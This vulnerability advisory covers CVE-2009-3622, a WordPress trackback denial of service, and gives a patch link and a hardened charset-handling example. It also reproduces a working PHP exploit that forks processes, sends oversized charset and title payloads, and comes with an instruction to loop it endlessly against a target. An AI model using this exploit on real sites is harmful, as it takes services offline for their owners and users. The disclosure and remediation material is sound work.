WordPress Trackback Script Denial of Service Vulnerability

2009-10-27T00:00:00
ID SSV:12520
Type seebug
Reporter Root
Modified 2009-10-27T00:00:00

Description

CVE ID: CVE-2009-3622

WordPress is a free blog system.

The wp-trackback.php script in WordPress lets a user submit multiple source character encodings to the mb_convert_encoding() function. If a remote attacker sends an HTTP request containing an overlong title parameter together with a charset parameter made up of many comma-separated "UTF-8" substrings, the conversion consumes large amounts of CPU time.

WordPress < 2.8.5

Vendor patch:

WordPress

The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's homepage:

http://wordpress.org/development/2009/10/wordpress-2-8-5-hardening-release/

<?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* security@wordpress.org contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org <panic@zerial.org>
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) < 2)
    die("You need to specify a url to attack\n");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.\n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n <= 5; $n++){
    $fp = @fsockopen($data['host'],80);
        if(!$fp)
        die("unable to connect to: ".$data['host']."\n");
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, "POST $path HTTP/1.1\r\n");
        fputs($fp, "Host: ".$data['host']."\r\n");
        fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
        fputs($fp, "Content-length: ".strlen($str)."\r\n");
        fputs($fp, "Connection: close\r\n\r\n");
        fputs($fp, $str."\r\n\r\n");
        echo "hit!\n";
    }
}
?>
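As an added illustration (not WordPress's own code and not part of the original advisory or the exploit above), here is the pattern the description refers to with a hardened version beside it: the unsafe function hands the caller's comma-separated charset list straight to mb_convert_encoding(), while the safe one accepts a single allowlisted encoding and bounds the title before doing any conversion work. The allowlist, the length bound and the function names are assumptions.

```php
<?php
// Added example, not WordPress code: validating a trackback's charset and
// title before mb_convert_encoding() is called. Names and limits are assumed.

// Encodings a trackback sender may legitimately declare (assumed allowlist).
const TRACKBACK_CHARSETS = ['UTF-8', 'ISO-8859-1', 'US-ASCII', 'SHIFT_JIS', 'EUC-JP'];
const TRACKBACK_TITLE_MAX = 250; // bytes; assumed bound for a post title

/**
 * Vulnerable pattern: the raw charset parameter, which may be a very long
 * comma-separated list, is passed directly to mb_convert_encoding(), so the
 * caller controls how much conversion work the server performs.
 */
function convert_title_unsafe(string $title, string $charset): string {
    return mb_convert_encoding($title, 'UTF-8', $charset);
}

/**
 * Hardened pattern: accept exactly one allowlisted encoding (no list
 * syntax) and refuse oversized input before any conversion happens.
 * Returns null when the request should be rejected.
 */
function convert_title_safe(string $title, string $charset): ?string {
    $charset = strtoupper(trim($charset));
    if (strpbrk($charset, ", \t") !== false) {           // reject "A,B,C" lists
        return null;
    }
    if (!in_array($charset, TRACKBACK_CHARSETS, true)) {  // reject unknown names
        return null;
    }
    if (strlen($title) > TRACKBACK_TITLE_MAX) {           // bound the work
        return null;
    }
    return mb_convert_encoding($title, 'UTF-8', $charset);
}

// Constructed inputs: a normal trackback, and one shaped like the DoS request.
$normal = convert_title_safe('Hello trackback', 'utf-8');
$abuse  = convert_title_safe(str_repeat('A', 140000), str_repeat('UTF-8,', 1000));
var_dump($normal !== null, $abuse === null);
```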